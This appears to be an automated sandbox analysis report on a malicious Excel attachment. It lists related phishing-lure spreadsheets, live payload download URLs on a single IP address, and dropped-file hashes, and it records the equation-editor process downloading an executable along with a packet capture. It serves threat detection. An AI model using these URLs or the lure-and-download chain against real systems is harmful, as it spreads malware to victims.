        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        16:42:40API Interceptor85x Sleep call for process: EQNEDT32.EXE modified
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        198.12.81.20MV LADY FLORA 47K.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/scan9/SCAN9.exe
        MT 103 copy.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/copy6/COPY6.exe
        order P47 0082005924.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/LOADT/LOADT.exe
        Revised Order BUCKLE.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/book/BOOK.exe
        SOA 20220405 - 51731086.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/SCAN6/SCAN6.exe
        SEA FREIGHT IMPORT.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/sat5/SAT5.exe
        LPGC CIPTA DIAMOND.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/sat5/SAT5.exe
        Remittance Form.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/file4/FILE4.exe
        TT Application form.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/doc88/DOC88.exe
        doc.xlsGet hashmaliciousBrowse
        • 198.12.81.20/xloader/XLOADER.exe
        TT APPLICATION FORM.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/file4/FILE4.exe
        Quotation Req.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/xday/XDAY.exe
        Nichols PI.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/loadme/LOADME.exe
        Payment Advice SCB.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/loaderb/LOADERB.exe
        WAF MT Passion PL.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/hloader/HLOADER.exe
        NEWWAY SEA FREIGHT.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/qloader/QLOADER.exe
        WMC quote20022.4.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/vloader/VLOADER.exe
        BL MEDUMV037749.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/mloader/MLOADER.exe
        Invoice067.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/CLOADER/CLOADER.exe
        DHL7301062360.xlsxGet hashmaliciousBrowse
        • 198.12.81.20/5LOADER/5LOADER.exe
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        AS-COLOCROSSINGUSPO TO GIS #0890.xlsxGet hashmaliciousBrowse
        • 107.175.218.31
        shipn_docs.xlsxGet hashmaliciousBrowse
        • 192.3.152.135
        Order_List.xlsxGet hashmaliciousBrowse
        • 104.168.33.12
        bank swiftcopy.xlsxGet hashmaliciousBrowse
        • 198.12.91.249
        Paymentnotification115.xlsxGet hashmaliciousBrowse
        • 192.3.121.203
        ORDER M52022.xlsxGet hashmaliciousBrowse
        • 107.175.3.53
        Product_List.xlsxGet hashmaliciousBrowse
        • 192.227.158.85
        Lawsuit-120522.xlsxGet hashmaliciousBrowse
        • 104.168.33.121
        New order.xlsxGet hashmaliciousBrowse
        • 104.168.33.25
        PO0975.xlsxGet hashmaliciousBrowse
        • 172.245.120.113
        soa.xlsxGet hashmaliciousBrowse
        • 172.245.27.27
        Bank Details.xlsxGet hashmaliciousBrowse
        • 198.12.89.207
        43127-20220512.xlsxGet hashmaliciousBrowse
        • 107.175.212.60
        http://192.227.158.85/god.exeGet hashmaliciousBrowse
        • 192.227.158.85
        Statement.xlsxGet hashmaliciousBrowse
        • 192.3.152.135
        MV LADY FLORA 47K.xlsxGet hashmaliciousBrowse
        • 198.12.81.20
        MV PRIDE PACIFIC 2206N.xlsxGet hashmaliciousBrowse
        • 107.172.93.57
        P O CSCL REF 1198.xlsxGet hashmaliciousBrowse
        • 198.23.251.5
        SO-127.xlsxGet hashmaliciousBrowse
        • 107.175.218.12
        remittance advice.xlsxGet hashmaliciousBrowse
        • 198.12.89.207
        No context
        No context
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Category:downloaded
        Size (bytes):255769
        Entropy (8bit):7.906288840175113
        Encrypted:false
        SSDEEP:6144:LOtIOtWQ/YWOXDYv0RgaJ1LULzHgpZQR7ZnbpEBb7TLwV1Azo:LOLtX/DOEMRgUa8M1cbfLwDj
        MD5:029BBE98A216416EB698CA543A5C0830
        SHA1:A24173F1DAF45D7444E3C698C3AE09A540A818DD
        SHA-256:E73B7DE772353638ADDD480041E90A67F27D8D5B087BF222B1C6649C54B9CC57
        SHA-512:684ACD7F2302C8DEAE1FC81EC9E5811588692BA0F8A080FE26A959DBDE8159BAFD4906684ADE4639051ABAF563B4438F8BD99B115AB5D668A845A4DE9D2830BC
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Reputation:low
        IE Cache URL:http://198.12.81.20/busy/BUSY.exe
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ms-windows metafont .wmf
        Category:dropped
        Size (bytes):1970
        Entropy (8bit):5.125773446782967
        Encrypted:false
        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
        MD5:30935B0D56A69E2E57355F8033ADF98B
        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ms-windows metafont .wmf
        Category:dropped
        Size (bytes):4630
        Entropy (8bit):5.070400845866794
        Encrypted:false
        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ms-windows metafont .wmf
        Category:dropped
        Size (bytes):1970
        Entropy (8bit):5.125773446782967
        Encrypted:false
        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
        MD5:30935B0D56A69E2E57355F8033ADF98B
        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ms-windows metafont .wmf
        Category:dropped
        Size (bytes):4630
        Entropy (8bit):5.070400845866794
        Encrypted:false
        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
        Malicious:false
        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):223752
        Entropy (8bit):3.2805343869701504
        Encrypted:false
        SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
        MD5:8E3A74F7AA420B02D34C69E625969C0A
        SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
        SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
        SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
        Malicious:false
        Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\Public\vbc.exe
        File Type:data
        Category:dropped
        Size (bytes):167423
        Entropy (8bit):7.991030598002282
        Encrypted:true
        SSDEEP:3072:z1F74Q5ZD00MiVOYj9zJCzR9WNT6E2CA22/VG6QF574Br1q:z1FkqlVOUIzAZzaVGRGBr1q
        MD5:40FF96237005585BB3469F7844D579EA
        SHA1:CB38299275DA36B767A8EDD8AF4546CF0165B6D6
        SHA-256:81B2280B25F3F4BEF5A87D35291A9D6FD9D57E754FFDE05628663AC65F324257
        SHA-512:52E449F89A8F97696A96C98142D01AC9C34753DECFC24365AB0FBD820E54482C1C61A8A05E69D21D77F32099C831355EB24F5196BF3CCF91CE3A5F4383C64466
        Malicious:false
        Preview:....?.V.*...t...c...u.2.. ..l...q.&.m..3...%......E.~..#...u....x.P..g9..Xq.....pi..@.|.6.}..&...J.7.'...^....K#.....D..tqv...<..AH99y........bH...]../.e.......U^..t....^.'d....>#....2.O.-..*.K..3N.7.:.Z/d.Q4.,.SZ....[..U`..I'.#....9.A......g~..C.?.V.h#..e.......-...ha.l......m..3.....%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?........'dk.L......k....-..*.d...TOy.".sd.Q4.,.,....H[......I.#x.....A.......g0..C.?.V....Ne...........ha.l...q.&.m..3...%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?.....^.'d.g....._...O.-..*.d...TOy.:./d.Q4.,.,....H[......I.#x.....A.......g0..C.?.V....Ne...........ha.l...q.&.m..3...%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?.....^.'d.g....._...O.-..*.d...TOy.:./d.Q4.,.,....H[.
        Process:C:\Users\Public\vbc.exe
        File Type:data
        Category:dropped
        Size (bytes):5418
        Entropy (8bit):6.08058386157834
        Encrypted:false
        SSDEEP:96:v5fm8CsQMHXy2ZcUqP0PkvET4Ua36tHDp22n2CXn23PNYi7JArcUN9zB+v0QUe6S:hfQ03pQvESkHc22823PNMr/99+vh6S
        MD5:05102B10AF50DD080DF138356B05637D
        SHA1:BFB1ABB77EA1CE16E41D207C10FF31D6509558AB
        SHA-256:865D3959F838A6F4D41B9CF369C5863A10CD322A5F0410FD03A577890166D891
        SHA-512:2318CD339F1F65991D59A43E2C30368AA1DBEE674A8149D21DC5E56C8274CFA01AAEEBECC44043E82B6DA804F01DBDB05D4180115FC9073967C1F11CC7416BBE
        Malicious:false
        Preview:.....u..[..k.o[E..'o.`'+e.'o.`'+e.[E..e."...[E...U&.U*.e.j.....e..u..U&.U*.e.j.....e.u..U&.U*.e.j....e..u..U&.U*.e.j....e..u.[]*.p.D..C...e&..e..u..e*[....e.m.e.m....D*y..e..u...e.o..E.[..D......[.>%..E..U.y.U.t.U....U..y.U.w.U.x..N*...&....f.:[..U..U..t.e.'%.e..E.......>.;...[.>-.E.xw.e.wxs.&.u....'o.`'+e.e...e&K:.e..m*.......u.e.e....m...e.u..&.b..W.L....b.....b`..W.z..........b-v.W.h..........u..[."'o.`'+e.e.*...e..e.[]..N.e...e...e.e...e.....%...N..e.D.yC...-..n-..e.D.y....-..n-.D.D..C...%.jb`..W.....j.....e..'.e.j.U..d...e.[]..N.[E....e.....e....u..[..'o.`'+e.e."...e..e.[]..N.e...e...e.e...e........'^....e.D.yC...-..n-..e&.D.y....-..n-..e*.D.y...-..n-..e...D.tC...5..f5..e.D.y....-..n-.D%D..C...%.jb..W.....j.....e.[]..N.e.m.../.U..U..U*.U&.U......e.[]..N.[E....e.....e....u..[.6.e.*...e..e.[]..N.e...e...e.e...e........N..e.D.yC...-..n-.e&.D.y....-..n-.D.D..C...%.jb-v.W.....j.....e..(.U&.U....
        Process:C:\Users\Public\vbc.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):80384
        Entropy (8bit):6.294165791913379
        Encrypted:false
        SSDEEP:1536:jugTaC+v1eUfr0oxAomP3cX/4pi2sWjcdQQI:Na5UUD1/ui5QL
        MD5:51F62DEF6DC686B87CC0BAFC31685546
        SHA1:C99222ABD6547D34DED56B44CC5818675D902F07
        SHA-256:9E398BB06FD1CBF54E40BFB36211CBD5C73AF57E652603C9B6A37A70DAB5AF4D
        SHA-512:1D4933E4C6BA61833174819B34F59C266B2CFD5B4DA3ED36DD9C2FB8AC047EF0C76B4DE173432E1451D7CD3A489511EA4223B8941EF5FAED0EB09E7A921CBD76
        Malicious:true
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L....?~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\Public\vbc.exe
        File Type:data
        Category:dropped
        Size (bytes):263211
        Entropy (8bit):7.569144130803792
        Encrypted:false
        SSDEEP:3072:i1F74Q5ZD00MiVOYj9zJCzR9WNT6E2CA22/VG6QF574Br1X7a5UUD1/ui5QL:i1FkqlVOUIzAZzaVGRGBr1QUQU
        MD5:6EFB91B44285F8050C8CBCC272E54FDB
        SHA1:2B6B1160680ACA8809287FE2D055BA30963A04EE
        SHA-256:54719DDAC4D092D918795FD291A01E1F03A203C49AE742D6077D201E2622BFE5
        SHA-512:8AB0FB7A8751E406E164DCB3DE836558D7A9ACD3EC18700BC580535C8EC61B16657C304BDB303D34639847FA8F3510DFA9EFC5F890B53807714C700A8267541D
        Malicious:false
        Preview:.&......,...................O...........(&.......&..........................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:CDFV2 Encrypted
        Category:dropped
        Size (bytes):95744
        Entropy (8bit):7.917920397581561
        Encrypted:false
        SSDEEP:1536:yXU9VxBJCTSeGZ2gbUh+WfVNjhqrBHKXplac20EUy:yX4nCTSedaUZtvqFHKecd
        MD5:E5C9C992C088A778A6348F4A58DD78D3
        SHA1:754F386DF06785DDD4CB4A04BED626CEAB65D5AB
        SHA-256:6B8FFB251308A2396F35780DF9376B329A6C741419DB44EA4F89D88ED932FBF2
        SHA-512:AD3AEB0EB38D9870289E91F385AC8490A94F9932033DF269F5BA9D2F0D5220A9228753F2ACAA3B16FA77B60FB6FAD4E6D385DA37C59B2ADCF770B04C9D03D601
        Malicious:false
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):165
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
        MD5:797869BB881CFBCDAC2064F92B26E46F
        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
        Malicious:true
        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Category:dropped
        Size (bytes):255769
        Entropy (8bit):7.906288840175113
        Encrypted:false
        SSDEEP:6144:LOtIOtWQ/YWOXDYv0RgaJ1LULzHgpZQR7ZnbpEBb7TLwV1Azo:LOLtX/DOEMRgUa8M1cbfLwDj
        MD5:029BBE98A216416EB698CA543A5C0830
        SHA1:A24173F1DAF45D7444E3C698C3AE09A540A818DD
        SHA-256:E73B7DE772353638ADDD480041E90A67F27D8D5B087BF222B1C6649C54B9CC57
        SHA-512:684ACD7F2302C8DEAE1FC81EC9E5811588692BA0F8A080FE26A959DBDE8159BAFD4906684ADE4639051ABAF563B4438F8BD99B115AB5D668A845A4DE9D2830BC
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
        File type:CDFV2 Encrypted
        Entropy (8bit):7.917920397581561
        TrID:
        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
        File name:PO 65738963578 Revise Settlement.xlsx
        File size:95744
        MD5:e5c9c992c088a778a6348f4a58dd78d3
        SHA1:754f386df06785ddd4cb4a04bed626ceab65d5ab
        SHA256:6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
        SHA512:ad3aeb0eb38d9870289e91f385ac8490a94f9932033df269f5ba9d2f0d5220a9228753f2acaa3b16fa77b60fb6fad4e6d385da37c59b2adcf770b04c9d03d601
        SSDEEP:1536:yXU9VxBJCTSeGZ2gbUh+WfVNjhqrBHKXplac20EUy:yX4nCTSedaUZtvqFHKecd
        TLSH:7C93F12EBE58CF14C62B52776C85D03D86986C02F5D2733B959CBE5A68B3CC08CA19F5
        File Content Preview:........................>......................................................................................................................................................................................................................................
        Icon Hash:e4e2aa8aa4b4bcb4
        TimestampSource PortDest PortSource IPDest IP
        May 13, 2022 16:42:02.339994907 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.455461025 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.455568075 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.456495047 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.572757959 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.572815895 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.572864056 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.572873116 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.572896004 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.572926044 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.572926998 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.572988033 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573003054 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573048115 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573049068 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573088884 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573128939 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573137045 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573160887 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573177099 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573175907 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573216915 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.573220968 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.573256969 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.590251923 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687007904 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687072039 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687144041 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687154055 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687174082 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687196970 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687227964 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687237024 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687262058 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687279940 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687294006 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687320948 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687346935 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687359095 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687398911 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687398911 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687421083 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687438965 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687464952 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687477112 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687495947 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687515974 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687525988 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687556028 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687587023 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687597036 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687613010 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687637091 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687673092 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687674046 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687705994 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687714100 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687720060 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687752962 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687777996 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687791109 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687808037 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687829971 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.687850952 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.687886000 CEST4917380192.168.2.22198.12.81.20
